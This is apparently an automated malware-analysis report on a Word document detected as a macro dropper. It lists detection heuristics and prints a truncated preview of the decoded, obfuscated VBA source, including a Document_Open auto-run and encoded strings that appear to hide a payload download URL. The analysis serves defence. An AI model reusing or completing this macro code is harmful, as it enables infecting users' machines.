MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Dropper.Donoff-5743527-0. Static analysis reveals the presence of VBA macros, specifically a Document_Open macro that utilizes CreateObject and CallByName functions. This indicates the macro is designed to execute code, likely to download and run a second-stage payload, which is a common dropper behavior.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17670 bytes |
SHA-256: 14dab8f4f24531d789bf3cd40aef905c0f39bb35e117d0514123cc9837c70c7f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub AqGIzOKmku(ByVal YvByVGEUfwYs As String, ByVal QiDmKkBU As Integer)
RAJkxRAO True, "MNg", 9044
nrqgBvsk "DLSsB", ""
ByVbq
WeAlUmwjSz = 6741
If cflKZw("3BI", 886, 440) Then
FAeYprPcpRgS = 9024
CeAcctfZO
qMCjGfmVgV 1883
gsxMraXnbqZ = 3192
kfSTUdthq "VBJG"
dXILydnFmTir = "Uicp"
Else
VoJvXXYEXe 653, 5024, 4694
ZMvPIAJHbku "DQ", 9258
rrRNJUtbK
CAHSphrfj = False
End If
End Sub
Private Sub iEMevxNXKeiBVU(ByVal TtkUWvPOjl As Integer)
NgoSddEgU "", "VbEL", "7MLBx"
sVglOQFbX = 358
mkQmWSqrEMlr
zWbkNYECj = "LA"
If bYdAMratRzstY(True, 55, True) Then
YDnGiDqipjZAE = 4069
niCDeuQ 555, "", 2131
uaNNpRBQTLHV = "sg"
wSzryoMjmSYPO
Else
EJQyxPZQZscjHA
yoquJznjLWBRYo 9355
aPZDHBxPWc = "gaQ"
End If
End Sub
Private Sub Document_Open()
Dim MuddGSA As Integer
Dim HkTGL As Boolean
qnkUkTXLLKw.IeAnzpa
End Sub
Attribute VB_Name = "qnkUkTXLLKw"
Private Sub wojyUoR(ByVal woICsv As String, ByVal FgdFaveLMVVy As String)
pHhOWgIUTIArYE "lYA"
xlPCeCtDtQmUAk = "IlE"
JyQrCFs "", "qvY", True
End Sub
Private Sub rYlbTvFKg(ByVal GmNrfGZBukgJwv As Integer, ByVal Mtmrrd As String)
YSEoOP 3110
TqqsyPuI = 6371
tINZvihqRnYCBl "RF9qQ", ""
ehXjUuue = True
alLTGqw
End Sub
Private Sub SOqZeEOfaraC(ByVal HKbmiKoYxFAeJ As String, ByVal BDwJCfiw As Boolean)
CmZsoCjspV
tLCsWWYL
pCQCVJ
End Sub
Public Function GkzxQoo(ByVal EMUHlfGzpzqClj As String, ByVal ZvqRmQ As String) As Object
Dim wQcVFxFA As Integer
Dim emryecrSU As String
Set GkzxQoo = VnKWVQDwMUQ(CreateObject(EMUHlfGzpzqClj))
End Function
Public Sub IeAnzpa()
Dim GeJyhXh As String
Dim zIJkdjyt As Integer
On Error GoTo NqemBDRpWkUZar
yYLHHCYO.rmNuzMTH
yYLHHCYO.tPccuuhyHWh
wGxOdbqz
Exit Sub
NqemBDRpWkUZar:
End Sub
Private Sub sFDsnWNTDKxuw(ByVal EKcEzayYoKj As String)
nuqatJfPl = "DF30A"
If jJsvg Then
DZksN False, "tdVmq"
oRaDszJLr
NwDhdgwwJgu True
Else
cxDckEVa 2123
End If
pRVrImJizyHN "0A", 972
End Sub
Private Function VnKWVQDwMUQ(ByVal eZRkOVn As Object) As Object
Dim CLAjVgeR As Integer
Set VnKWVQDwMUQ = eZRkOVn
End Function
Private Sub HEQKZTe(ByVal mQSDUIqaxD As String, ByVal iIzHeiaxpbCgTJ As String, ByVal CWYeXx As String)
Set GgHpvTKZDohLE = CMmmIEQhRjKTmS.TEEexLWgIt(True, CWYeXx)
CMmmIEQhRjKTmS.GxbdD lMqvVUJEqCr, 2670, "LQ", GgHpvTKZDohLE
cslCcVNz.fccxvdQ PYkIIQvyh.jeiGVrDDEqx(BYdaZ, GgHpvTKZDohLE, 8879), False, "", mQSDUIqaxD
End Sub
Private Sub wGxOdbqz()
Dim WEWUl As Boolean
HEQKZTe cslCcVNz.iTXEKA, "jCVl", jpedGjO
cslCcVNz.oQJliWFbrPOx False, 618, cslCcVNz.iTXEKA
End Sub
Private Function lMqvVUJEqCr() As String
lMqvVUJEqCr = nRWwXeQ.NyuGNIACWILvzX("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function BYdaZ() As String
BYdaZ = nRWwXeQ.NyuGNIACWILvzX("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function jpedGjO() As String
jpedGjO = nRWwXeQ.NyuGNIACWILvzX("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
Attribute VB_Name = "nRWwXeQ"
Private Function HKPBzhQwSlfh(ByVal YMRuUXdOIuTOx As Integer, ByVal ryLlErdUlAIqAA As Integer, ByVal VasbcNkpFwE As String, ByVal AOADjSepJEqEpp As String) As String
If Not ZXTnxsyUa.xlRcdsFOGNN(AOADjSepJEqEpp, False, False, VasbcNkpFwE) Then
HKPBzhQwSlfh = AOADjSepJEqEpp
End If
End Function
Private Function yCDtRB(ByVal kLeZi As String) As String
mmRHE
LmWHpkRmpQX = False
SvYYBFIc
yCDtRB = "7Hue7"
End Function
Public Function NyuGNIACWILvzX(ByVal fUBXNCtjw As String, ByVal tLmcqkIA As String) As String
mzyTYBakx = 4259
For pTgqCQKsQwbVaI = tQvWpYBDwq To ZXTnxsyUa.TLCppSWdloGaUn("reFdg", "Bpg", fUBXNCtjw)
yYQZuhdeq = 8749
NyuGNIACWILvzX = ZXTnxsyUa.eOzdtLHUIC(5793, NyuGNIACWILvzX, HKPBzhQwSlfh(3772, 6608, tLmcqkIA, ZXTnxsyUa.iAEYk(pTgqC
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.